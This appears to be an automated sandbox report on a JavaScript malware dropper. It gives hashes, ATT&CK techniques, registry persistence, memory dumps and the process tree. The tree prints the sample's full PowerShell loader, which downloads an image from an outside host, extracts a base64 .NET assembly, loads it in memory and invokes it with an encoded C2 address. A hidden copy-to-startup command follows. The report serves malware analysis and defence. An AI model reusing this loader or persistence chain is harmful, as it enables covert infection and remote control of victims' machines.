436bc83fc6c6a4fc2174a7c97a6d286fa90681224192ea1a2313d0b1fa210224

Analysis

max time kernel
148s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
30/08/2023, 05:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ba93bcc0af4e24bb5f51e7fb4dff26ed.js
Size

309KB
MD5

ba93bcc0af4e24bb5f51e7fb4dff26ed
SHA1

7d99468f20bce4d57164ef226c1b4b03f0425950
SHA256

436bc83fc6c6a4fc2174a7c97a6d286fa90681224192ea1a2313d0b1fa210224
SHA512

ba1f27842b59e873db5238896b84ac008882f90dd0d120b89b2c4f5a7fece27b57fe76bafda6c3ae402d6e0b0efb57c74f0595637340aa129f4b36fd65b7783e
SSDEEP

6144:/QK4xddLBqzEkmQK4xddLB41ndndndndndndnd9SQK4xddLBhQK4xddLBjQK4xdA:3zEk41ndndndndndndnd9c1

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/591/183/original/js_startup.jpg?1693260919

exe.dropper

https://uploaddeimagens.com.br/images/004/591/183/original/js_startup.jpg?1693260919

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	228	powershell.exe
45	228	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Admin\\AppData\\Roaming\\3e07b238-e6ba-4cb1-92fc-cb2e582f4808.js"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
228	powershell.exe
228	powershell.exe
4932	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4968 wrote to memory of 228	4968	wscript.exe	83
PID 4968 wrote to memory of 228	4968	wscript.exe	83
PID 228 wrote to memory of 4932	228	powershell.exe	93
PID 228 wrote to memory of 4932	228	powershell.exe	93

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ba93bcc0af4e24bb5f51e7fb4dff26ed.js
1⤵
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $imageUrl ='https://uploaddeimagens.com.br/images/004/591/183/original/js_startup.jpg?1693260919';$webClient =New-Object System.Net.WebClient;$imageBytes =$webClient.DownloadData($imageUrl);$imageText =[System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex =$imageText.IndexOf($startFlag);$endIndex =$imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=$startFlag.Length;$base64Length =$endIndex - $startIndex;$base64Command =$imageText.Substring($startIndex, $base64Length);$commandBytes =[System.Convert]::FromBase64String($base64Command);$loadedAssembly =[System.Reflection.Assembly]::Load($commandBytes);$type =$loadedAssembly.GetType('Fiber.Home');$method =$type.GetMethod('VAI');$arguments =,('dHh0LmVtbS80MzEuMTcuNjEyLjU4MS8vOnB0dGg=');$method.Invoke($null, $arguments)
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.js -Destination C:\Users\Admin\AppData\Roaming\3e07b238-e6ba-4cb1-92fc-cb2e582f4808.js
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2836
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5898e0a3e89b3923338156a819dcfbb4

SHA1
5f460e64f79e49aba3cce37ee725752c960eb2c4

SHA256
12605d235372a4999794df643bc8abc3ed94d4a24b808e7e1ea37c694bef35aa

SHA512
f3d7af0d06502dfae08090f4d8143c461c24f2ac0a5276fcc762c98e6d1e03fa00569214a86b96d866434341405d71d5797f313dd36c01b16dace7a73bb3c946

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sle5f3kt.5yt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/228-50-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-38-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-13-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-14-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-16-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-18-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-20-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-22-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-24-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-26-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-28-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-30-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-32-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-56-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-36-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-54-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-40-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-42-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-44-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-46-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-48-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-5-0x000001BF3E400000-0x000001BF3E422000-memory.dmp

Filesize
136KB

Download
memory/228-12-0x000001BF25D40000-0x000001BF25D50000-memory.dmp

Filesize
64KB

Download
memory/228-52-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-34-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-58-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-60-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-62-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-64-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-66-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-68-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-70-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-72-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-74-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-76-0x000001BF3F2A0000-0x000001BF3F5BA000-memory.dmp

Filesize
3.1MB

Download
memory/228-109-0x00007FFA74260000-0x00007FFA74D21000-memory.dmp

Filesize
10.8MB

Download
memory/228-152-0x000001BF25D40000-0x000001BF25D50000-memory.dmp

Filesize
64KB

Download
memory/228-155-0x000001BF25D40000-0x000001BF25D50000-memory.dmp

Filesize
64KB

Download
memory/228-10478-0x000001BF3E550000-0x000001BF3E551000-memory.dmp

Filesize
4KB

Download
memory/228-10498-0x00007FFA74260000-0x00007FFA74D21000-memory.dmp

Filesize
10.8MB

Download
memory/228-10-0x00007FFA74260000-0x00007FFA74D21000-memory.dmp

Filesize
10.8MB

Download
memory/228-11-0x000001BF25D40000-0x000001BF25D50000-memory.dmp

Filesize
64KB

Download
memory/4932-10489-0x000001D651CA0000-0x000001D651CB0000-memory.dmp

Filesize
64KB

Download
memory/4932-10497-0x00007FFA74260000-0x00007FFA74D21000-memory.dmp

Filesize
10.8MB

Download
memory/4932-10488-0x00007FFA74260000-0x00007FFA74D21000-memory.dmp

Filesize
10.8MB

Download